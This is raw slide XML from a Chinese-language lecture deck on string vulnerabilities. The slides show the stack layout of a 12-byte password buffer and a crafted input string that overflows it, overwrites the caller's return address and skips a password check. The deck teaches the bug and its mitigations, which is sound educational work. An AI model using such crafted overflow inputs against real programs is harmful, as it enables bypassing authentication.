                        <a:t>Password (12 Bytes)</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600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="accent2"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>“123456789012”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8313">
                <a:tc>
                  <a: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zh-CN" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>调用者</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>EBP – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>帧指针</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>main </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>(4 bytes)</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600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="accent2"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>“3456”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68313">
                <a:tc>
                  <a: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zh-CN" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>调用者的返回地址</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>– main (4 Bytes)</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600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="accent2"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>“7890”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638175">
                <a:tc>
                  <a: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zh-CN" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>存储</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>PwStatus</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t> (4 bytes)</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600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="accent2"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体"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512763">
                <a:tc>
                  <a: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zh-CN" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>调用者</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>EBP – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>帧指针</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>OS </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>(4 bytes)</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="accent2"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Arial" charset="0"/>
                        <a:ea typeface="宋体" charset="0"/>
                        <a:cs typeface="宋体"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414338">
                <a:tc>
                  <a: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600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>Main</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>的返回地址</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>– OS (4 Bytes)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342900" marR="0" lvl="0" indent="-342900" algn="ct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700" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体"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7910" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="2819400"/>
            <a:ext cx="403225" cy="11113"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg"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7911" name="Text Box 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6838950" y="1143000"/>
            <a:ext cx="44291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zh-CN" altLang="en-US">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>栈</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37912" name="Line 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="2695575"/>
            <a:ext cx="457200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="412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7913" name="Text Box 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="4343400"/>
            <a:ext cx="5029200"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zh-CN" altLang="en-US">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>栈中的返回地址和其他数据被覆写了，因为分配的存储空间只能包含最多</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>个字符加上结尾的空字符。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37914" name="Text Box 52"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="2438400"/>
            <a:ext cx="5111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600">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>EIP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37915" name="Text Box 53"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4838700" y="2286000"/>
            <a:ext cx="5889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600">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>ESP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="灯片编号占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3004D887-5878-D44E-9983-6476AABB8F49}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3098027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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>问题</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6147" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009999"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>字符串</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009999"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>背景和常见问题</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>常见的字符串操作错误</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>字符串漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>缓解措施</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="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3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4162815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a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38915" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611560" y="1820863"/>
            <a:ext cx="8001000" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>一个精心构造的字符串</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>“1234567890123456j►*!” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>会产生下面的结果。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38916" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="965200" y="5029200"/>
            <a:ext cx="2438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zh-CN" altLang="en-US" sz="2800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>发生了什么？ </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="0">
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38917" name="Picture 1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3568" y="2906535"/>
            <a:ext cx="8001000" cy="1736725"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="灯片编号占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D21C09B4-D851-4043-BACE-08EB012A6BE7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1634491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z="3500">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>发生了什么？ </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3500">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39939" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1981200"/>
            <a:ext cx="3695700" cy="1371600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>“1234567890123456j►*!”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>覆写了栈中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>9 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>字节的存储空间，改变了调用者的返回地址，且跳过了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 3-5  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>行，直接开始执行第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="295088" name="Group 176"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4252913" y="1905000"/>
          <a:ext cx="4724400" cy="3593403"/>
        </p:xfrm>
        <a:graphic>
